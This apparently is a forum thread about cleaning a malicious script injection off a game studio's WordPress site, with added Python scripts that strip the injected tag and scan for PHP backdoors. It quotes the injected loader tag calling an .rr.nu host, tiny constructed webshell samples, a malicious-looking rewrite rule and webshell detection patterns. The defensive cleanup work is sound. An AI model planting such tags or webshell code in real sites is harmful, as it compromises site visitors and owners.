Website got injected


DrAtomic

The Xenonauts homepage has been injected with a malicious url. Look at the parsed code and you'll find <script src="http://rie21rcom.rr.nu/mm.php?d=1"></script> at the end of the script.

Most common causes are farmed FTP passwords, usage of open-source software that needs to be updated, or usage of variables in custom code that aren't checked against XSS. See http://www.acunetix.com to download a free scanner (the free scanner will highlight enough to see what needs to be fixed; clean the website first before running it though).


OK, site appears to be restored and all major passwords are changed, plus the WordPress admin directory is changed from default. Hopefully that'll stop it happening again, but I'll have a play with Acunetix when it arrives. Thanks for the information!

You're welcome. A common cause outside of the website sources themselves is farmed FTP accounts. Website-wise, just be sure to be running the latest version of WordPress and also make sure to check if any plugins need updating (from your WP admin area).


I am still getting sent to malicious sites when visiting this website, unfortunately... (was sent to another Russian site about a minute ago).

Registered just to give a heads-up :)

(or was it my cache? hmmm - I would advise keeping an eye out anyway).


Wonderful. I've updated WordPress to the latest version and changed my WordPress password now too.

I don't know what else could be causing it, because there's only one FTP user with access to the domain and I changed the password on that yesterday. I hope it doesn't happen again.


Hmmm, even that doesn't seem to be working. I installed a heavy-duty WordPress security plugin; hopefully that'll prevent further intrusion...

But according to http://sitecheck.sucuri.net/scanner/, I still have malicious code on the website. Anyone know a method for how I can find and remove it?

*. Check the modification date of your index.php (since it got infected again) to see when it was last infected.

*. Download all the webfiles to your local computer

*. Search for the string '.rr.nu' in all files

*. Clean all files that contain <script src="http://blablablablabla.rr.nu/mm.php?d=1"></script>; the string will be added to the bottom of the files, so open file, scroll to bottom, delete.

*. Check the content of your .htaccess (it could contain a malicious rewrite rule) and make sure it is what it should be. If unsure, or if you never modified the original, then simply delete it and replace it with the original that comes with the WordPress sources. My guess is that you do use URL rewrite (search engine friendly URLs based

*. Run a virus scanner over the downloaded code (this will find any files that may have been uploaded that reinfect the website).

*. Make sure to run a malware scanner on your own computer as well.

*. Once everything is clean again, reset your passwords again just to be sure.

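The cleanup steps above, worked through as an added Python script (not code from the thread): it walks a downloaded copy of the site, lists every web file that contains the injected .rr.nu script tag with its modification time (newest first, so the top entry is the last reinfection), strips the tag, and flags .htaccess RewriteRule/RewriteCond lines that point at an absolute URL. The sample tree it builds is constructed for the demo; example-host.rr.nu and evil.example are placeholder names.

```python
"""Find and strip an injected <script src="http://<host>.rr.nu/..."></script> tag from a
downloaded copy of a site, and flag .htaccess rewrite rules pointing off-site.
Added example, not code from the thread; the sample files in demo() are constructed."""
import re
import tempfile
from datetime import datetime
from pathlib import Path

# Matches the tag as the thread describes it: any host under rr.nu, any path after it.
INJECTED_TAG = re.compile(
    r'<script\s+src=["\']https?://[^"\'/]+\.rr\.nu/[^"\']*["\']\s*>\s*</script>\s*',
    re.IGNORECASE,
)
# A RewriteRule/RewriteCond mentioning an absolute URL deserves a manual look.
EXTERNAL_REWRITE = re.compile(r'^\s*Rewrite(?:Rule|Cond)\b.*https?://', re.IGNORECASE)
WEB_EXTS = {".php", ".html", ".htm", ".js"}


def strip_injected(text):
    """Return (cleaned_text, number_of_tags_removed)."""
    return INJECTED_TAG.subn("", text)


def find_infected(root):
    """Return [(relative_path, mtime_iso)] for files containing the tag, newest first."""
    root = Path(root)
    hits = []
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in WEB_EXTS:
            if INJECTED_TAG.search(p.read_text(errors="replace")):
                hits.append((p.relative_to(root).as_posix(), p.stat().st_mtime))
    hits.sort(key=lambda h: h[1], reverse=True)
    return [(rel, datetime.fromtimestamp(m).isoformat(timespec="seconds")) for rel, m in hits]


def clean_tree(root):
    """Strip the tag from every infected file under root; return total tags removed."""
    root = Path(root)
    removed = 0
    for rel, _ in find_infected(root):
        p = root / rel
        cleaned, n = strip_injected(p.read_text(errors="replace"))
        if n:
            p.write_text(cleaned)
        removed += n
    return removed


def check_htaccess(root):
    """Return [(relative_path, line)] for suspicious lines in every .htaccess under root."""
    root = Path(root)
    findings = []
    for p in root.rglob(".htaccess"):
        for line in p.read_text(errors="replace").splitlines():
            if EXTERNAL_REWRITE.search(line):
                findings.append((p.relative_to(root).as_posix(), line.strip()))
    return findings


def demo():
    """Build a constructed site copy, run the sweep, and return a summary dict."""
    root = Path(tempfile.mkdtemp())
    (root / "index.php").write_text(
        "<?php get_header(); ?>\n<p>hello</p>\n"
        '<script src="http://example-host.rr.nu/mm.php?d=1"></script>'  # appended at EOF, as in the thread
    )
    (root / "about.html").write_text("<html><body>clean</body></html>\n")
    (root / ".htaccess").write_text(
        "RewriteEngine On\nRewriteRule ^(.*)$ http://evil.example/$1 [R,L]\n"  # constructed rule
    )
    infected = [rel for rel, _ in find_infected(root)]
    removed = clean_tree(root)
    return {
        "infected": infected,
        "removed": removed,
        "still_infected": find_infected(root),
        "htaccess": check_htaccess(root),
        "index_after": (root / "index.php").read_text(),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

Point it at the downloaded copy rather than the live server: find_infected() first to see the mtime spread, then clean_tree(), then re-run find_infected() to confirm it comes back empty. Anything check_htaccess() reports still has to be compared against a known-good .htaccess by hand.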

It might have been this vulnerability, as I see you have the Timthumb plugin:

http://markmaunder.com/2011/08/02/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/

That page is a very good writeup, and explains the possibility that they may have installed a backdoor - even if you have fixed how they got in the first time, they may have installed another way. It seems to be pretty common with Wordpress hacks to use a php based backdoor. DrAtomic's advice to run a virus scanner on the server is a good idea in my opinion. Sadly detection of php malware generally isn't as good as for exe stuff.

DrAtomic's advice sounds very good to me so I'm going to leave him to it, but I do have one question: you say you updated Wordpress, did you update all the plugins, too? I saw a very large number of exploited Wordpress sites at work today (AV industry), via some gallery plugin that lives in a directory named fgallery.

Good luck! This kind of hack is normally automated, so once you do clear out the traces they're not likely to come back.

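A heuristic sweep for the kind of PHP backdoor mentioned in the post above, as an added example (not code from the thread or from the linked write-up): it flags generic webshell markers such as eval() over a decoded blob, request parameters passed straight into eval()/system(), preg_replace() with the /e modifier, a request parameter used as a variable function name, very long base64 literals, and PHP files sitting in upload or cache directories. The rule set, directory list and sample files are my own constructed assumptions; a hit means "read this file by hand", not "this is malware".

```python
"""Heuristic sweep for PHP backdoors in a downloaded copy of a site.
Added example, not from the thread; rules and sample files are constructed assumptions."""
import re
import tempfile
from pathlib import Path

# (name, regex) pairs. Generic webshell markers, not signatures for a specific incident.
RULES = [
    ("eval of decoded blob", re.compile(
        r'\beval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(', re.I)),
    ("request data executed", re.compile(
        r'\b(?:eval|assert|system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b', re.I)),
    ("preg_replace /e modifier", re.compile(
        r'\bpreg_replace\s*\(\s*["\']([/#|~])[^"\']*?\1[a-z]*e[a-z]*["\']', re.I)),
    ("variable function from request", re.compile(
        r'\$\w+\s*=\s*\$_(?:GET|POST|REQUEST|COOKIE)\[[^\]]+\]\s*;\s*\$\w+\s*\(', re.I | re.S)),
    ("long base64 literal", re.compile(r'["\'][A-Za-z0-9+/]{200,}={0,2}["\']')),
]
PHP_EXTS = {".php", ".phtml", ".php5", ".inc"}
# Directories that should hold data, not executable PHP (assumed list).
SUSPICIOUS_DIRS = {"uploads", "cache", "tmp", "temp"}


def scan_text(text):
    """Return the names of every rule that fires on one file's contents."""
    return [name for name, rx in RULES if rx.search(text)]


def scan_tree(root):
    """Map relative path -> list of findings for every PHP file under root."""
    root = Path(root)
    report = {}
    for p in root.rglob("*"):
        if not p.is_file() or p.suffix.lower() not in PHP_EXTS:
            continue
        rel = p.relative_to(root)
        findings = scan_text(p.read_text(errors="replace"))
        # Location check uses the path relative to the site root, so a /tmp checkout
        # does not flag every file.
        if {d.lower() for d in rel.parts[:-1]} & SUSPICIOUS_DIRS:
            findings.append("php file in upload/cache directory")
        if findings:
            report[rel.as_posix()] = findings
    return report


def demo():
    """Build a constructed site tree with three planted files and one clean one."""
    root = Path(tempfile.mkdtemp())
    (root / "wp-content" / "uploads").mkdir(parents=True)
    (root / "wp-content" / "themes").mkdir(parents=True)
    (root / "wp-content" / "uploads" / "x.php").write_text(
        '<?php eval(base64_decode("aGVsbG8=")); ?>')                       # planted
    (root / "c.php").write_text('<?php preg_replace("/.*/e", $_POST["c"], ""); ?>')  # planted
    (root / "s.php").write_text('<?php $f = $_GET["a"]; $f("id"); ?>')    # planted
    (root / "wp-content" / "themes" / "functions.php").write_text(
        '<?php function f() { return 1; } ?>')                           # clean
    return scan_tree(root)


if __name__ == "__main__":
    for path, findings in sorted(demo().items()):
        print(path, "->", ", ".join(findings))
```

Run it over the same downloaded copy as the tag sweep, and diff the flagged files against a pristine WordPress/plugin download of the same version: legitimate code rarely trips more than the base64 rule, and a PHP file under wp-content/uploads is almost never supposed to be there.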

I couldn't get that to work. In the end I took the nuclear option and wiped the site, then restored a backup I took in January. I then applied all the security fixes, which should hopefully close the original vulnerabilities, and updated my passwords. It appears to have fixed the issue.

Thank god for backups, eh?


Chris, you've been checking naughty Russian sites for mail order brides again haven't you? :P J/K

I've got some friends that do web security work if need be. Just say the word and can give you the name of a good company that provides site security.


I think I've done a pretty good job of dealing with the malware, but I'm still getting occasional reports of people encountering warnings from the site (even though I've scanned the whole thing for the problem script and found nothing).

The vulnerability only affects IE and people have mentioned encountering it on the Screenshot and Pre-Order pages so far (I've had some problems with script errors on the screenshot page when I open a screenshot).

If anyone knows anything about web security, would they mind having a look at that page to see if they can replicate the malware warnings? I can't seem to do it myself so I don't really know what to look for...

I am taking a look. Not sure if I will be able to find anything.

EDIT: I cannot find anything at the moment... but I will do more of a check once I am out of training and home.
